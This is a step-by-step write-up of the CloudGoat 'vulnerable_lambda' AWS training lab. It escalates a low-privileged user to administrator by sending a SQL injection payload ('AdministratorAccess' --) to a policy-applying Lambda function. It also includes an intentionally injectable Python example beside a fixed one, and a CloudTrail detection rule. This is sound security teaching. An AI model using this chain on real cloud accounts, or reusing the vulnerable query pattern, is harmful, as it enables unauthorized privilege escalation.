# CloudGoat 2.0 - vulnerable_lambda

[vulnerable\_lambda](https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/scenarios/vulnerable_lambda/README.md) is one of the scenarios from [CloudGoat](https://github.com/RhinoSecurityLabs/cloudgoat), an intentionally vulnerable-by-design AWS environment.

Difficulty: Easy

## Hands-On

### Task

Run the CloudGoat script, which uses Terraform to deploy the vulnerable scenario into your AWS account.

```bash
./cloudgoat.py create vulnerable_lambda
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700635525120/04f31305-fa88-4646-a3e9-b46cac4a146a.png align="center")

Once the setup is complete, the credentials for the scenario's starting user are written to the file shown below.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700635721192/8fe9b6bb-4d87-4ad4-97dd-c810af536621.png align="center")

The task is to use these credentials to authenticate as the low-privileged user and escalate privileges within the cloud environment.

### Hints

The scenario author provides a diagram of the intended exploitation route, which we can use to fast-track the win.

![Lucidchart Diagram](https://github.com/RhinoSecurityLabs/cloudgoat/raw/master/scenarios/vulnerable_lambda/exploitation_route.png align="left")

### Solution

Authenticate using the new credentials. The profile is named `bilbo`, after the user shown in the hints diagram.

```bash
# Disable the CLI pager so output is printed straight to stdout
export AWS_PAGER=
aws configure --profile bilbo
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700636742592/63dfc6a2-9357-4b43-9e83-571e2285e599.png align="center")

Check the user ID and account information

```bash
aws sts get-caller-identity --profile bilbo
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700636884016/8d7c0279-f6c9-4658-88b5-3b0473bf0f67.png align="center")

The hints diagram says "List IAM roles", so let's do that.

```bash
aws iam list-roles --profile bilbo | jq '.Roles[].RoleName'
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700637347388/b61a6a9b-ad56-4597-8e44-09d24166bdaa.png align="center")

Among dozens of roles, two stand out because their names reference the `vulnerable_lambda` scenario. Let's see what they are made of!

The role name in the command below will differ for you, because the scenario ID suffix is randomly generated. Replace it accordingly.

```bash
export ROLE_NAME=cg-lambda-invoker-vulnerable_lambda_cgid0isrortd10
aws iam get-role --profile bilbo --role-name $ROLE_NAME | jq -r '.Role.AssumeRolePolicyDocument.Statement'
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700637657093/3035674a-eddb-4a63-9c8a-9a688f2e25d9.png align="center")

We have two roles: the trust policy of one allows our current user to assume it, while the other can only be assumed by the Lambda service. Let's assume the `cg-lambda-invoker-...` role. To assume the role, we need its ARN.

```bash
aws iam get-role --profile bilbo --role-name $ROLE_NAME | jq -r '.Role.Arn'
```

Use the ARN from above to assume the role.

```bash
aws sts assume-role --profile bilbo --role-arn arn:aws:iam::558267956267:role/cg-lambda-invoker-vulnerable_lambda_cgid0isrortd10 --role-session-name vulnerable-lambda-session
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700638264685/370ae921-6ee4-4af8-b225-b3c2e797bb5e.png align="center")

Either create a new profile with the temporary credentials returned for the assumed role, or export them as environment variables.

```bash
output=$(aws sts assume-role --profile bilbo --role-arn arn:aws:iam::558267956267:role/cg-lambda-invoker-vulnerable_lambda_cgid0isrortd10 --role-session-name vulnerable-lambda-session)
export AWS_ACCESS_KEY_ID=$(echo "$output" | jq -r '.Credentials.AccessKeyId')
export AWS_SECRET_ACCESS_KEY=$(echo "$output" | jq -r '.Credentials.SecretAccessKey')
export AWS_SESSION_TOKEN=$(echo "$output" | jq -r '.Credentials.SessionToken')
aws sts get-caller-identity
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700638485982/3caffc8b-1a35-4c89-9945-4d2afab59f5c.png align="center")

The caller ARN now ends in `vulnerable-lambda-session`, so we are on the right path. Since this role is allowed to perform Lambda operations, let's list the Lambda functions.

#### Lambda functions & analysis

```bash
aws lambda list-functions
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700638729879/ee6445fa-37d3-4212-8c78-754fe16183e9.png align="center")

In the description, we can see: `This function will apply a managed policy to the user of your choice, so long as the database says that it's okay...`

If that is true, we could attach a managed policy such as `AdministratorAccess` to our user and elevate privileges. To confirm how the check works, let's download the source code.

```bash
# Get the function name (the nested command below assumes the scenario deploys a single function)
aws lambda list-functions | jq -r '.Functions[].FunctionName'
# Show the deployment package details, including its download location
aws lambda get-function --function-name $(aws lambda list-functions | jq -r '.Functions[].FunctionName') | jq -r '.Code'
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700638845117/ae6bc63b-e3fc-4e44-9e78-9cc5107dc619.png align="center")

Download the source code from this location.

```bash
mkdir /tmp/test
wget -O /tmp/test/download.zip $(aws lambda get-function --function-name $(aws lambda list-functions | jq -r '.Functions[].FunctionName') | jq -r '.Code.Location')
cd /tmp/test
unzip download.zip
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700639024384/7aebc850-f367-4540-93e2-e03b15ff6944.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700639094644/f02cf042-28c4-499a-a484-8009b95c1fdb.png align="center")

If you scroll to the end of `main.py`, you can see the expected payload structure for invoking the Lambda function.

```json
{
    "policy_names": [
        "AmazonSNSReadOnlyAccess",
        "AWSLambda_ReadOnlyAccess"
    ],
    "user_name": "cg-bilbo-user"
}
```

Check the username of the `bilbo` profile user.

```bash
aws sts get-caller-identity --profile bilbo
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700809062088/cf05f79e-77d7-41d2-8604-edb0f60507c9.png align="center")

Now let's target this bilbo user and try to assign over-privileged permissions. In my case, the `user_name` is `cg-bilbo-vulnerable_lambda_cgid0isrortd10`. Save the following to `payload.json`.

```json
{
    "policy_names": [
        "AmazonSNSReadOnlyAccess",
        "AWSLambda_ReadOnlyAccess",
        "AdministratorAccess"
    ],
    "user_name": "cg-bilbo-vulnerable_lambda_cgid0isrortd10"
}
```

Using the assumed role's credentials, which are allowed to invoke Lambda functions, invoke the function with this file as the payload.

```bash
aws lambda invoke --function-name vulnerable_lambda_cgid0isrortd10-policy_applier_lambda1 --payload file://./payload.json --cli-binary-format raw-in-base64-out out.txt
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700809733527/a40e0df0-ff64-408d-8265-6072dc189319.png align="center")

The output says that `AdministratorAccess` is not an approved policy.

#### SQL Injection

Looking at the `main.py` code, there is no validation of the user-supplied input, which opens up the possibility of SQL injection.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700809851101/17861a5d-c030-455a-a355-38779e7492b0.png align="center")
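To make the bug concrete, here is an added example (my own illustration, not the CloudGoat `main.py` code) that models the approval lookup against an in-memory SQLite table. It assumes the database lists `AdministratorAccess` with `public='False'`, which is why the plain invoke was refused, and shows the string-spliced query next to a parameterized, allowlisted version.

```python
import re
import sqlite3
from typing import Callable, List

# Constructed stand-in for the scenario's policy database (illustration only,
# not the CloudGoat main.py code). Assumes AdministratorAccess is present but
# flagged public='False'.
POLICY_TABLE = [
    ("AmazonSNSReadOnlyAccess", "True"),
    ("AWSLambda_ReadOnlyAccess", "True"),
    ("AdministratorAccess", "False"),
]
# Character set IAM permits in managed policy names.
POLICY_NAME_RE = re.compile(r"[\w+=,.@-]+")

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE policies (policy_name TEXT, public TEXT)")
    conn.executemany("INSERT INTO policies VALUES (?, ?)", POLICY_TABLE)
    return conn

def is_approved_vulnerable(conn: sqlite3.Connection, policy_name: str) -> bool:
    # Vulnerable pattern: the caller-supplied name is spliced into the SQL text.
    # A name ending in "' --" closes the string literal and comments out the
    # AND public='True' condition, so the non-public row is accepted.
    sql = (f"SELECT policy_name FROM policies "
           f"WHERE policy_name='{policy_name}' AND public='True'")
    return conn.execute(sql).fetchone() is not None

def is_approved_safe(conn: sqlite3.Connection, policy_name: str) -> bool:
    # Hardened: reject names outside IAM's character set up front, then bind
    # the value as a parameter so it can never be parsed as SQL.
    if not POLICY_NAME_RE.fullmatch(policy_name):
        return False
    row = conn.execute(
        "SELECT policy_name FROM policies WHERE policy_name=? AND public='True'",
        (policy_name,),
    ).fetchone()
    return row is not None

def approved_policies(conn: sqlite3.Connection, payload: dict,
                      check: Callable[[sqlite3.Connection, str], bool]) -> List[str]:
    # Run the chosen check over the policy_names list of an invoke payload.
    return [p for p in payload["policy_names"] if check(conn, p)]

if __name__ == "__main__":
    db = make_db()
    payload = {"policy_names": ["AmazonSNSReadOnlyAccess", "AdministratorAccess' --"],
               "user_name": "cg-bilbo-user"}
    print("vulnerable:", approved_policies(db, payload, is_approved_vulnerable))
    print("hardened:  ", approved_policies(db, payload, is_approved_safe))
```

The parameterized query alone closes the injection; the character-set check is a second layer that also stops odd names from ever reaching IAM.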

Let's try to create a payload with SQL injection.

```json
{
    "policy_names": [
        "AmazonSNSReadOnlyAccess",
        "AWSLambda_ReadOnlyAccess",
        "AdministratorAccess' --"
    ],
    "user_name": "cg-bilbo-vulnerable_lambda_cgid0isrortd10"
}
```

Invoke the lambda function!

```bash
aws lambda invoke --function-name vulnerable_lambda_cgid0isrortd10-policy_applier_lambda1 --payload file://./payload.json --cli-binary-format raw-in-base64-out out.txt
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700809971048/74d15615-9e0a-42d0-83cd-852e56ee6491.png align="center")

Now let's check the permissions of the `bilbo` user with `list-attached-user-policies`.

```bash
aws sts get-caller-identity --profile bilbo # Get user-name from here
aws iam list-attached-user-policies --profile bilbo --user-name cg-bilbo-vulnerable_lambda_cgid0isrortd10
```

As the output shows, the user now has `AdministratorAccess` attached.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1700810159162/5d4f2a8c-90e2-4672-9c52-d805921425bf.png align="center")

We successfully elevated the privileges to be an administrator.
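From the defender's side, the end state of this chain is an IAM role session attaching `AdministratorAccess` to a user, which CloudTrail records as an `AttachUserPolicy` event. The following is an added example (not part of the original post) of a detection rule run over constructed CloudTrail-style records; the account ID, execution role name and timestamps are placeholders.

```python
from typing import Dict, List

# Managed policies whose attachment should always raise an alert.
HIGH_PRIV_POLICIES = {"arn:aws:iam::aws:policy/AdministratorAccess"}
ATTACH_EVENTS = {"AttachUserPolicy", "AttachRolePolicy", "AttachGroupPolicy"}

# Constructed CloudTrail-style records, not real logs. Account ID, role name
# and timestamps are placeholders for this illustration.
SAMPLE_EVENTS: List[Dict] = [
    {"eventTime": "2023-11-24T06:45:10Z", "eventSource": "lambda.amazonaws.com",
     "eventName": "Invoke", "userIdentity": {"type": "AssumedRole"},
     "requestParameters": {"functionName": "policy_applier_lambda1"}},
    {"eventTime": "2023-11-24T06:45:11Z", "eventSource": "iam.amazonaws.com",
     "eventName": "AttachUserPolicy",
     "userIdentity": {"type": "AssumedRole", "sessionContext": {"sessionIssuer": {
         "arn": "arn:aws:iam::111122223333:role/policy_applier_lambda1-role"}}},
     "requestParameters": {"userName": "cg-bilbo-user",
                           "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}},
    {"eventTime": "2023-11-24T06:45:12Z", "eventSource": "iam.amazonaws.com",
     "eventName": "AttachUserPolicy",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/alice"},
     "requestParameters": {"userName": "cg-bilbo-user",
                           "policyArn": "arn:aws:iam::aws:policy/AmazonSNSReadOnlyAccess"}},
]

def find_privilege_grants(events: List[Dict]) -> List[Dict]:
    """Return one finding per attachment of a high-privilege managed policy."""
    findings = []
    for e in events:
        if e.get("eventSource") != "iam.amazonaws.com" or e.get("eventName") not in ATTACH_EVENTS:
            continue
        params = e.get("requestParameters") or {}
        policy = params.get("policyArn", "")
        if policy not in HIGH_PRIV_POLICIES:
            continue
        ident = e.get("userIdentity") or {}
        issuer = ((ident.get("sessionContext") or {}).get("sessionIssuer") or {}).get("arn")
        findings.append({
            "time": e.get("eventTime"),
            "actor": issuer or ident.get("arn", "unknown"),
            "target": params.get("userName") or params.get("roleName") or params.get("groupName"),
            "policy": policy,
            # A role session (such as a Lambda execution role) granting admin is this
            # scenario's signature; a human IAM user doing it still deserves review.
            "severity": "critical" if ident.get("type") == "AssumedRole" else "high",
        })
    return findings

if __name__ == "__main__":
    for finding in find_privilege_grants(SAMPLE_EVENTS):
        print(finding)
```

A tighter rule for this scenario would additionally require the attaching principal to be the Lambda function's own execution role, which ought to never need `iam:AttachUserPolicy` on arbitrary users in the first place.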
